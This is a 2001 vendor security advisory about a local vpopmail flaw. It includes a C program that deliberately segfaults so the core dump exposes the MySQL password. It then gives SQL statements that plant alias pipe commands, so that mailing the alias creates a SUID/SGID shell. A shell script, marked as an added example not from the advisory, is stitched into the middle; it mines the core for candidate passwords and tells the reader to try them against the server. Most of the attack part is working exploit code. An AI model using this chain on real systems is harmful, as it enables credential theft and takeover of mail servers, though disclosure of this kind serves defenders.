www.inter7.com
Inter7 Internet Technologies, Inc.
Internal Advisory
------------------------------------------
Date 08/09/2001
Category Security
Item vpopmail [DEVELOPMENT]
Severity Medium
Distribution Public
Status: Package is in development; the stable release is to be patched
Summary:
A memory dump taken after a vpopmail API call exposes the database
credentials, giving full database permissions, which can lead to a root
compromise. There are other variants of this attack; this document covers
only one of them, using MySQL.
Full description:
A local attacker without root privileges who runs the following code may
be able to read the database password vpopmail was compiled with. The
attack only works if valias support has been enabled.
#include <stdio.h>
#include <sys/types.h>
#include "vauth.h"   /* vpopmail's authentication API; link against libvpopmail */

int main(int argc, char *argv[])
{
    char *p = NULL;
    struct vqpasswd *pw = NULL;

    (void)argc;
    (void)argv;

    /* Any API call that opens the database connection will do: vauth_getall()
     * makes the library connect with its built-in credentials, which leaves
     * them in this process's memory. */
    pw = vauth_getall("domain.com", 1, 0);
    if (!pw) {
        printf("Failed.\n");
        return 1;
    }
    printf("Dumping.\n");

    /* Deliberate NULL-pointer write: the SIGSEGV makes the process dump core
     * while the credentials are still in memory. */
    *p = 'x';

    /* Shouldn't get here. */
    return 0;
}
With core dumps enabled (ulimit -c), this program crashes and leaves a core
file containing the process image, from which the password stored for the
database can be recovered (for instance with strings(1)).
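The recovery step the advisory leaves to the reader, as an added example that is not part of the Inter7 advisory: a POSIX shell script that lists the printable strings in the core and flags those next to recognisable MySQL/vpopmail markers. The program name ./dump, the core file name "core", the marker list, the heuristic that the client keeps host, user, password and database name near each other, and the constructed fake core used to exercise the functions are all assumptions, not facts from the advisory.

```shell
#!/bin/sh
# Added example (not from the Inter7 advisory): pull candidate credential
# strings out of a core dump. Assumes the crashing program from the advisory
# was built as ./dump and that the kernel writes the core to ./core; both are
# assumptions, the core file name depends on the system's core settings.

# core_strings FILE: print every printable run of at least 6 bytes, one per
# line, much as strings(1) would, without depending on binutils being present.
core_strings() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | LC_ALL=C grep -E '^.{6,}$'
}

# core_candidates FILE [CTX]: print the strings that match a MySQL/vpopmail
# marker plus CTX neighbouring strings on each side, prefixed with their index.
# Heuristic (an assumption, not something the advisory states): the client
# keeps host, user, password and database name near each other in memory, so
# the password usually shows up beside a string you recognise.
core_candidates() {
    core_strings "$1" | awk -v ctx="${2:-2}" -v re='mysql|vpopmail|vchkpw|localhost' '
    function emit(n, s) { if (n > last) { print n ": " s; last = n } }
    {
        if (tolower($0) ~ re) {
            for (k = ctx; k >= 1; k--) if (NR - k >= 1) emit(NR - k, prev[k])
            emit(NR, $0)
            upto = NR + ctx
        } else if (NR <= upto) {
            emit(NR, $0)
        }
        for (k = ctx; k > 1; k--) prev[k] = prev[k - 1]
        prev[1] = $0
    }'
}

# make_fake_core FILE: write a constructed stand-in for a real core so the
# functions can be exercised offline; the bytes and the password are made up.
make_fake_core() {
    printf 'ELF\177\001\002\003localhost\000vpopmail\000s3cr3t_pw\000vpopmail\000\377\376junk' > "$1"
}

# Typical use against a real crash:
#   ulimit -c unlimited; ./dump; core_candidates core 2
```

Run it after the crash and read the output around the host and user name strings; the value that is not a host, user or database name is the one to try against the server.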
Once access to the database has been gained, the following MySQL statements
set up an alias, test, whose delivery instructions copy /bin/sh and turn the
copy into a SUID/SGID shell owned by the vpopmail user and vchkpw group:
INSERT INTO valias values ('test', 'domain.com',
'|/bin/chmod ug+rxs,o+rx /home/vpopmail/vsh');
INSERT INTO valias values ('test', 'domain.com',
'|/bin/cp /bin/sh /home/vpopmail/vsh');
Lastly, all the attacker must do is send mail to test@domain.com; delivering
the message runs the alias commands as vpopmail and creates the shell, which
can be executed later. Note that the cp must run before the chmod: if the
chmod is processed first, the first message only leaves a plain copy of
/bin/sh, and a second message to the same alias applies the SUID/SGID bits.
As the vpopmail user the attacker can read and modify all email passing
through the system, and can replace vpopmail binaries and libraries with
trojaned versions, which can lead to a root compromise.
--
[EMAIL PROTECTED]
Inter7 Internet Technologies, Inc. - www.inter7.com